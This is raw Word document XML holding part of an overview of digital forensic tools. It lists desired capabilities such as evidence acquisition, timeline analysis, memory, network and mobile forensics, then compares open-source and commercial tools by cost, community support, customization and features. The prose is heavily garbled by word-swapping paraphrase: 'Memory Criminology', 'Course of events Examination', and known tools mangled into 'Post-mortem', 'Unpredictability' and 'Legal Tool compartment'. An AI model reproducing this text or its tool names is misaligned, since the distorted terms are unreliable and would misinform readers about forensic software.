          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D7D8EEF" wp14:editId="38826F4A">
            <wp:extent cx="5092700" cy="31394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 (1).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5092700" cy="3139440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27486775" w14:textId="77777777" w:rsidR="0044529A" w:rsidRPr="009F3DB4" w:rsidRDefault="0044529A" w:rsidP="0044529A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F3DB4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FIG 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62198BED" w14:textId="0919E542" w:rsidR="0044529A" w:rsidRDefault="0044529A" w:rsidP="007D07AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="417CC681" w14:textId="6AD81F2C" w:rsidR="0044529A" w:rsidRDefault="0044529A" w:rsidP="007D07AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0030D2CD" w14:textId="6C13A0AB" w:rsidR="0044529A" w:rsidRDefault="0044529A" w:rsidP="007D07AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4807A1AE" w14:textId="77777777" w:rsidR="0044529A" w:rsidRDefault="0044529A" w:rsidP="007D07AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B5CC793" w14:textId="725C77A5" w:rsidR="007D07AB" w:rsidRPr="007D07AB" w:rsidRDefault="003710D6" w:rsidP="007D07AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BEF7391" wp14:editId="6B256E63">
            <wp:extent cx="205740" cy="205740"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="4" name="Graphic 4" descr="Arrow Slight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ghtcurve.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05740" cy="205740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="007D07AB" w:rsidRPr="007D07AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Current state of digital forensic tools, their features and capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5FF066" w14:textId="579621AA" w:rsidR="00411EED" w:rsidRDefault="00411EED" w:rsidP="00411EED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1152"/>
        </w:tabs>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359661D5" w14:textId="77777777" w:rsidR="00411EED" w:rsidRPr="00411EED" w:rsidRDefault="00411EED" w:rsidP="00411EED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1152"/>
        </w:tabs>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0E21A1" w14:textId="775CFA44" w:rsidR="007D07AB" w:rsidRPr="003710D6" w:rsidRDefault="007D07AB" w:rsidP="0066330B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2CFA66"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Search for devices that help an extensive variety of capacity media, document frameworks, and information types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248EFDE3"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 xml:space="preserve">The capacity to secure information forensically, guaranteeing the honesty and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003710D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>validness</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003710D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of proof, is a basic component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAEB759"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Investigation and Assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCF8467"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Hearty pursuit and ordering abilities are fundamental for proficiently filtering through huge volumes of information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201754F0"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Support for different document designs and the capacity to recuperate erased or secret records add to the general viability of a device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2235C8" w14:textId="6AF94765"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Course of events Examination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4615FDF7" w14:textId="0E890050" w:rsidR="007D07AB" w:rsidRPr="003710D6" w:rsidRDefault="007D07AB" w:rsidP="0066330B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1656"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003710D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Many </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003710D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>highlevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003710D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> instruments offer timetable examination highlights, assisting specialists with remaking occasions and groupings of exercises on a framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B181F5" w14:textId="77777777" w:rsidR="003710D6" w:rsidRDefault="003710D6" w:rsidP="007D07AB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1656"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54BCB82F" w14:textId="610562F0"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Memory Criminology:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C4D481"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Instruments that consolidate memory legal sciences abilities are fundamental for breaking down unstable memory and recognizing dynamic cycles and curios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102A7B00" w14:textId="6E522CAE" w:rsidR="0066330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Network Crime scene investigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7CD423"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Research whether the devices incorporate highlights for breaking down network traffic, recognizing correspondence examples, and following advanced proof across networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267FFC96" w14:textId="1709CEE0" w:rsidR="0066330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Portable Crime scene investigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD5797F"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Given the commonness of cell phones, advanced scientific apparatuses ought to have highlights well defined for portable crime scene investigation, including support for cell phones and tablets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA2CD16"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Detailing and Documentation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9D4F99"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Complete revealing highlights are vital for recording discoveries and introducing proof in a reasonable and justifiable way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0363B8"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Robotization and Productivity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2E12CD"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Assess apparatuses that consolidate mechanization to smooth out redundant errands, further developing productivity in the analytical cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018DCC11" w14:textId="3D377E3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Local area Backing and Updates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DA6A57"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Devices that have a functioning client local area and get customary updates will quite often be more solid and versatile to arising difficulties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512E4DFE"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lastRenderedPageBreak/>
        <w:t>Lawful Consistence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD5B1D1"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Guarantee that the devices stick to legitimate principles and prerequisites, as the uprightness of proof is vital in legal procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24422072" w14:textId="77777777" w:rsidR="007D07AB" w:rsidRPr="003710D6" w:rsidRDefault="007D07AB" w:rsidP="007D07AB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1656"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D4DC5D1"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b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NOTE</w:t>
      </w:r>
      <w:r w:rsidRPr="003710D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073D7B3F" w14:textId="68BB9CF8"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Well known computerized scientific instruments starting around 2022 included EnCase, Legal Tool compartment (FTK), Post-mortem, Unpredictability for memory crime scene investigation, and Cellebrite for portable criminology, among others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115461E8" w14:textId="09E31C26" w:rsidR="00411EED"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 xml:space="preserve">Remember that the field of advanced crime scene investigation is ceaselessly developing, and it's vital for stay informed about the most recent apparatuses, techniques, and best practices. Always confirm the most recent information from reliable sources and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003710D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>takeintoaccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003710D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the particular requirements of your investigations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDAD208" w14:textId="77777777" w:rsidR="00411EED" w:rsidRPr="003710D6" w:rsidRDefault="00411EED" w:rsidP="00411EED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B16888D" w14:textId="77777777" w:rsidR="00411EED" w:rsidRPr="003710D6" w:rsidRDefault="00411EED" w:rsidP="00411EED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A697359" w14:textId="0A7AE14C" w:rsidR="00411EED" w:rsidRPr="003710D6" w:rsidRDefault="00411EED" w:rsidP="000F4DEB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E38F29A" w14:textId="77777777" w:rsidR="003710D6" w:rsidRDefault="003710D6" w:rsidP="003710D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589A6B07" w14:textId="0A00BECB" w:rsidR="003710D6" w:rsidRPr="003710D6" w:rsidRDefault="003710D6" w:rsidP="003710D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003710D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Evaluate Open-source tools with commercial forensic tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3708CB14" w14:textId="77777777" w:rsidR="003710D6" w:rsidRDefault="003710D6" w:rsidP="003710D6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1152"/>
        </w:tabs>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2721CA6C" w14:textId="76AE84A6" w:rsidR="00411EED" w:rsidRDefault="00411EED" w:rsidP="000F4DEB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409FDF94" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Open-Source Instruments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505109B4" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="129BC2BB" w14:textId="5756577A" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Assessing open-source devices versus business scientific instruments includes considering different factors, for example, highlights, ease of use, local area backing, cost, and legitimate contemplations. Here is an overall outline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8A2817" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0319F9E7" w14:textId="2666CA59" w:rsidR="004D3DA9" w:rsidRPr="009F3DB4" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F3DB4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cost:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1694D5E8" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pros: Open-source apparatuses are for the most part allowed to utilize, making them savvy for associations with financial plan limitations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A05896" w14:textId="77777777" w:rsidR="0044529A" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cons: However, there may be some advanced features that are unavailable in paid software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1067998C" w14:textId="1B968606" w:rsidR="004D3DA9" w:rsidRPr="0044529A" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F3DB4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Community Assistance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3C0BF8" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pros: The communities that support and contribute to the development of open-source tools are frequently active. This can bring about customary updates and an abundance of information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A41478" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cons: Backing probably won't be essentially as organized or responsive similarly as with business apparatuses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B1FE4F" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="009F3DB4" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F3DB4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Customization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB0BB9C" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pros: Clients can change open-source instruments to suit explicit requirements, giving a serious level of adaptability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661A0971" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cons: Customization requires specialized mastery and may not be attainable for all clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE90F9E" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="009F3DB4" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F3DB4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C814C61" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pros: A few open-source instruments offer strong highlights, tantamount to business options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370A32EE" w14:textId="506D88CE" w:rsidR="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cons: The broadness and profundity of elements can differ, and certain specific functionalities may need.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152623D3" w14:textId="73391916" w:rsidR="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70844D1C" w14:textId="1E8F2F93" w:rsidR="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="608DEACA" w14:textId="7D709AA2" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="D9D9E3" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="D9D9E3" w:frame="1"/>
        </w:rPr>
        <w:t>Commercial Forensic Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3BCA23" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4709C816" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cost:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4DBED8" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pros: Business apparatuses frequently give far reaching elements and backing, legitimizing the expense for associations with the financial plan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9F4FEB" w14:textId="77777777" w:rsidR="004D3DA9" w:rsidRPr="004D3DA9" w:rsidRDefault="004D3DA9" w:rsidP="004D3DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3DA9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cons: The cost can be a critical boundary for more modest associations or individual clients.</w:t>
      </w:r>
    </w:p>
